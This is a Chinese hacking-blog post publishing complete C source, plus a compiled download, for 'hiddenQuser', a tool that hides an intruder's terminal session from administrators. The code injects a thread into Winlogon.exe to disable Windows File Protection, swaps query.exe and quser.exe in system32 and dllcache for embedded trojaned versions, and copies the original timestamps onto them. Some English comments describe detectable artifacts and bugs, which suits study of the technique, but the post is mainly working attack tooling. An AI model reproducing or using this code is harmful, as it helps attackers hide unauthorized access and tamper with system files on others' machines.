hiddenQuser + 源码

鬼仔:query user 这个命令大家都知道吧?这个程序的作用就是替换系统目录下的Quser.exe与Query.exe,这样你登录终端后,管理员使用 query user 查看时看不到你已经登录了,但是有一点不足的就是在任务管理器中没有隐藏。

来源:精灵's Blog
执行后替换系统目录下的Quser.exe与Query.exe,登录过终端服务器的朋友都知道这两个工具是做啥的吧~

大家都知道,在Windows 2000和Windows XP及2003系统中有系统文件保护功能,一旦被保护的系统文件被修改了,就会弹出需要插入系统安装盘CD的对话框。所以本工具采用了黑客之门的方法,通过远程注入进程让系统文件保护暂时失效,然后执行替换的操作.执行后自动替换系统的这两个文件包括dllcache下的对应文件,让系统文件保护也无法还原系统原来的这两个文件.

没什么技术含量,在任务管理器中隐藏还不会.
程序代码:

#include
#include
#include
#include"resource.h"

BOOL ExtractFile(LPCTSTR szResourceType,LPCTSTR szResourceName,LPCTSTR szFilePath,HMODULE hModule, // = NULL,
BOOL bHidden ); // = TRUE
DWORD GetProcessIDFromName(char * name);
BOOL DebugPrivilege(const char *PName,BOOL bEnable);

// Timestamps of the original query.exe. main() fills them once with
// GetFileTime() and ExtractFile() re-applies them with SetFileTime(), so
// every replacement binary carries the original file's dates (a defender
// comparing content age against file times will notice the mismatch).
FILETIME lpCreationTime; // creation time of the original file
FILETIME lpLastAccessTime; // last access time of the original file
FILETIME lpLastWriteTime; // last write time of the original file

/*
 * Entry point. Everything the program does is laid out below, in order:
 *   1. builds the paths of query.exe / quser.exe in the system directory and
 *      in its dllcache sub-directory;
 *   2. captures the timestamps of the original query.exe into the global
 *      FILETIME variables;
 *   3. enables SeDebugPrivilege and opens Winlogon.exe;
 *   4. loads sfc.dll (2000) or sfc_os.dll (XP/2003), resolves ordinal 2 and
 *      runs it on a thread created inside Winlogon.exe (the page describes
 *      this as switching system file protection off);
 *   5. runs four "rename" commands through system(), which leaves the
 *      originals behind as query1.exe / quser1.exe in both directories;
 *   6. writes the embedded resources IDR_MYEXE1 / IDR_MYEXE2 to the four
 *      paths with ExtractFile(), which also stamps them with the captured
 *      timestamps.
 * Steps 3-6 are the artifacts a defender can look for: a thread created in
 * Winlogon.exe by another process, cmd.exe spawned via system() with
 * "rename ... system32 ...", leftover *1.exe copies in system32 and
 * dllcache, and system binaries whose timestamps do not match their content.
 *
 * No return value is checked (CreateFile, OpenProcess, LoadLibrary,
 * CreateRemoteThread). hSfc is only assigned when the major version is 5,
 * so on any other version GetProcAddress reads an uninitialised handle.
 * hProcess is never closed and `void main` is non-standard.
 */
void main(int argc,char * argv[])
{
char System[MAX_PATH] = {0};
char System1[MAX_PATH] = {0};
char System2[MAX_PATH] = {0};
char System3[MAX_PATH] = {0};
char System4[MAX_PATH] = {0};
char Queryexe[MAX_PATH] = {0};
char Queryexe1[MAX_PATH] = {0};
char Quserexe[MAX_PATH] = {0};
char Quserexe1[MAX_PATH] = {0};
HANDLE hFile = INVALID_HANDLE_VALUE;

printf("\n=========================================================================\n");
printf("[F.S.T] hidden Other user info when execute query.exe & quser.exe\n");
printf("Welcome to [F.S.T] Http://Www.Wrsky.com\n");
printf("Code by Sprite\n");
printf("=========================================================================\n");

GetSystemDirectory(System,MAX_PATH);

// Path of the original query.exe; the strcat chain is not length-checked
strcat(Queryexe,System);
strcat(Queryexe,"\\query.exe");
printf("%s\n",Queryexe);

hFile = CreateFile(Queryexe,
GENERIC_READ,
FILE_SHARE_READ|FILE_SHARE_DELETE,
NULL,
OPEN_EXISTING,
FILE_FLAG_BACKUP_SEMANTICS,
NULL
);

// Read the original file's timestamps into the globals used by ExtractFile()
// (hFile is not checked against INVALID_HANDLE_VALUE)
GetFileTime(hFile, &lpCreationTime, &lpLastAccessTime, &lpLastWriteTime);

CloseHandle(hFile);

strcat(Quserexe,System);
strcat(Quserexe,"\\quser.exe");
printf("%s\n",Quserexe);

// Same two names under dllcache, the copies file protection restores from
strcat(Queryexe1,System);
strcat(Queryexe1,"\\dllcache");
strcat(Queryexe1,"\\query.exe");
printf("%s\n",Queryexe1);

strcat(Quserexe1,System);
strcat(Quserexe1,"\\dllcache");
strcat(Quserexe1,"\\quser.exe");
printf("%s\n",Quserexe1);

// Four shell command lines for system(): each renames an original to *1.exe
strcat(System1,"rename ");
strcat(System1,System);
strcat(System1,"\\query.exe ");
strcat(System1,"query1.exe");

strcat(System2,"rename ");
strcat(System2,System);
strcat(System2,"\\quser.exe ");
strcat(System2,"quser1.exe");

strcat(System3,"rename ");
strcat(System3,System);
strcat(System3,"\\dllcache");
strcat(System3,"\\query.exe ");
strcat(System3,"query1.exe");

strcat(System4,"rename ");
strcat(System4,System);
strcat(System4,"\\dllcache");
strcat(System4,"\\quser.exe ");
strcat(System4,"quser1.exe");

printf("%s\n",System1);
printf("%s\n",System2);
printf("%s\n",System3);
printf("%s\n",System4);

// SeDebugPrivilege is needed to open a system process such as Winlogon.exe
DebugPrivilege("SeDebugPrivilege",TRUE);

/* Get the process ID; this can be done with CreateToolhelp32Snapshot(),
   Process32First() and Process32Next() */

DWORD dwPid=GetProcessIDFromName("Winlogon.exe");

printf("Winlogon 's Process ID is:%d\n",dwPid);

// Rights required for CreateRemoteThread; the handle is not checked and never closed
HANDLE hProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwPid);

DWORD dwVersion;

HMODULE hSfc;

dwVersion = GetVersion();

// Determine the OS version: LOBYTE(LOWORD) is the major, HIBYTE(LOWORD) the minor

if ((DWORD)(LOBYTE(LOWORD(dwVersion))) == 5)

{// Windows 2000/XP/2003

if((DWORD)(HIBYTE(LOWORD(dwVersion))) == 0) //Windows 2000

hSfc = LoadLibrary("sfc.dll");

else if((DWORD)(HIBYTE(LOWORD(dwVersion))) == 1) //Windows XP

hSfc = LoadLibrary("sfc_os.dll");
else if((DWORD)(HIBYTE(LOWORD(dwVersion))) == 2) //Windows 2003

hSfc = LoadLibrary("sfc_os.dll");

}

// Resolve export ordinal 2 of the loaded library (hSfc unchecked)

FARPROC dwAddress=GetProcAddress(hSfc,MAKEINTRESOURCE(2));

DWORD dwThreadId;

HANDLE hThread;

// Create a thread inside Winlogon.exe starting at that address with a NULL
// parameter; this relies on the DLL being mapped at the same base address
// in both processes

hThread =CreateRemoteThread(hProcess,0,0,(DWORD (__stdcall *) (void *))dwAddress,0,0,&dwThreadId);

// Wait at most 2 s for the injected thread; the result is ignored
WaitForSingleObject(hThread,2000l);

// Rename via cmd.exe, dllcache copies first, then the system directory
system(System3);
system(System1);
system(System4);
system(System2);

// Write the embedded binaries to the four freed paths (CREATE_NEW inside
// ExtractFile(), so the renames above must have succeeded)
if (ExtractFile("myexe",MAKEINTRESOURCE(IDR_MYEXE1),Queryexe1,NULL,FALSE))
printf("Extract %s Success!\n",Queryexe1);
else
printf("Extract %s Error!\n",Queryexe1);

if (ExtractFile("myexe",MAKEINTRESOURCE(IDR_MYEXE1),Queryexe,NULL,FALSE))
printf("Extract %s Success!\n",Queryexe);
else
printf("Extract %s Error!\n",Queryexe);

if (ExtractFile("myexe",MAKEINTRESOURCE(IDR_MYEXE2),Quserexe1,NULL,FALSE))
printf("Extract %s Success!\n",Quserexe1);
else
printf("Extract %s Error!\n",Quserexe1);

if (ExtractFile("myexe",MAKEINTRESOURCE(IDR_MYEXE2),Quserexe,NULL,FALSE))
printf("Extract %s Success!\n",Quserexe);
else
printf("Extract %s Error!\n",Quserexe);
// SE_DEBUG_NAME expands to "SeDebugPrivilege", matching the enable call above
DebugPrivilege(SE_DEBUG_NAME,FALSE);
CloseHandle(hThread);
}

/*
 * ExtractFile: writes an embedded (custom) resource out as a file.
 *
 * szResourceType / szResourceName  resource to look up with FindResource
 * szFilePath                       destination; opened with CREATE_NEW, so
 *                                  the call fails if the file already exists
 *                                  (main() renames the originals away first)
 * hModule                          module holding the resource; NULL means
 *                                  the current executable
 * bHidden                          TRUE adds FILE_ATTRIBUTE_HIDDEN
 *
 * Returns TRUE on success. On every failure a message is printed and FALSE
 * is returned; a file left behind by a failed WriteFile is closed but not
 * removed. dwWritten is never compared with dwSize, so a short write counts
 * as success. After writing, the file is stamped with the global timestamps
 * captured in main(), so the new file shows the original file's dates.
 */
BOOL ExtractFile(LPCTSTR szResourceType,LPCTSTR szResourceName,LPCTSTR szFilePath,HMODULE hModule, // = NULL,
BOOL bHidden ) // = TRUE
{
// If the caller gave no module handle, look in the current executable
HMODULE hCurProc = hModule;
if ( NULL == hModule )
hCurProc = GetModuleHandle(NULL);
//ASSERT( hCurProc ); // find the RESOURCE_DEFINE resource data.
HRSRC hResourceExeFile;
hResourceExeFile = FindResource(hCurProc,szResourceName,szResourceType );

if ( ! hResourceExeFile )
{
//TRACE(_T("findresource failed!!(%ld) "), GetLastError());
printf("findresource failed!!(%ld) ", GetLastError());
return FALSE;
} // get size of resource
DWORD dwSize = SizeofResource( (HMODULE)hCurProc, hResourceExeFile );
if ( 0 == dwSize )
{
//TRACE(_T("can not get the resource size"));
printf("can not get the resource size");
return FALSE;
} // alloc the global memory
HGLOBAL hGlobalMem = LoadResource(hCurProc, hResourceExeFile );

if ( NULL == hGlobalMem )
{
//TRACE(_T("LoadResource failed! %ld"), GetLastError());
printf("LoadResource failed! %ld", GetLastError());
return FALSE;
}
// lock the resource (lpExe is not checked for NULL)
LPVOID lpExe = LockResource( hGlobalMem );
//ASSERT( lpExe );
/* Disabled: deleting an existing target before CREATE_NEW below
if (!DeleteFile(szFilePath))
{
printf("failed to delete file!");
return false;
}*/
// Optionally mark the new file hidden
DWORD dwAttrib = FILE_ATTRIBUTE_NORMAL;
if ( bHidden )
dwAttrib |= FILE_ATTRIBUTE_HIDDEN; // copy to file!!

HANDLE hFile = INVALID_HANDLE_VALUE;

// CREATE_NEW: fails with an error if szFilePath already exists
hFile = CreateFile(szFilePath,
GENERIC_WRITE,
0,
NULL,
CREATE_NEW,
dwAttrib,
NULL
);
if ( INVALID_HANDLE_VALUE == hFile )
{
//TRACE("can not open the target file (%ld) ", GetLastError());
printf("can not open the target file (%ld) ", GetLastError());
return FALSE;
}
DWORD dwWritten;

if ( ! WriteFile( hFile, lpExe, dwSize, &dwWritten, NULL ) )
{
//TRACE(_T("can not write the target file %ld"), GetLastError());
printf("can not write the target file %ld", GetLastError());
CloseHandle( hFile );
return FALSE;
}
// Apply the timestamps captured from the original query.exe (globals set in main)
SetFileTime(hFile, &lpCreationTime, &lpLastAccessTime, &lpLastWriteTime);

CloseHandle( hFile );
return TRUE;
}

// Enable or disable a privilege on the current process token

/*
 * DebugPrivilege: enables (bEnable != 0) or disables the privilege named by
 * PName (e.g. "SeDebugPrivilege") on the current process token.
 * Returns TRUE on success, FALSE if the token cannot be opened or if
 * GetLastError() is not ERROR_SUCCESS after AdjustTokenPrivileges — that is
 * how a privilege the token does not hold (ERROR_NOT_ALL_ASSIGNED) is seen,
 * since AdjustTokenPrivileges itself still returns nonzero in that case.
 * The LookupPrivilegeValue result is not checked.
 */
BOOL DebugPrivilege(const char *PName,BOOL bEnable)
{
BOOL bResult = TRUE;
HANDLE hToken;
TOKEN_PRIVILEGES TokenPrivileges;

if(OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,&hToken) == 0)
{
printf("Fail To OpenProcess \r\n");
bResult = FALSE;
return bResult;
}
// One privilege; Attributes 0 disables it
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
LookupPrivilegeValue(NULL,PName,&TokenPrivileges.Privileges[0].Luid);
AdjustTokenPrivileges(hToken,FALSE,&TokenPrivileges,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
if(GetLastError() != ERROR_SUCCESS)
{
printf("Fail To AddPrivilege \r\n");
bResult = FALSE;
}
CloseHandle(hToken);

return bResult;
}

// Look up a process ID by image name

/*
 * GetProcessIDFromName: returns the PID of the first process in a Toolhelp
 * snapshot whose image name equals `name` case-insensitively (stricmp).
 * Returns (DWORD)-1 when nothing matches and FALSE (0) when the snapshot
 * cannot be created, which a caller cannot tell apart from PID 0.
 * CreateToolhelp32Snapshot signals failure with INVALID_HANDLE_VALUE, not
 * NULL, so the NULL check below does not catch it. The snapshot handle is
 * never closed on any path.
 */
DWORD GetProcessIDFromName(char * name)
{
HANDLE snapshot ;
PROCESSENTRY32 processinfo ;
processinfo.dwSize = sizeof (processinfo) ; // required before Process32First
snapshot = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0) ;
if (snapshot == NULL) return FALSE;

BOOL status = Process32First (snapshot, &processinfo) ;
while (status)
{
if(stricmp(name,processinfo.szExeFile)==0)
return processinfo.th32ProcessID;
status = Process32Next (snapshot, &processinfo);
}
return -1;
}

编译好的程序下载:
hiddenQuser.rar
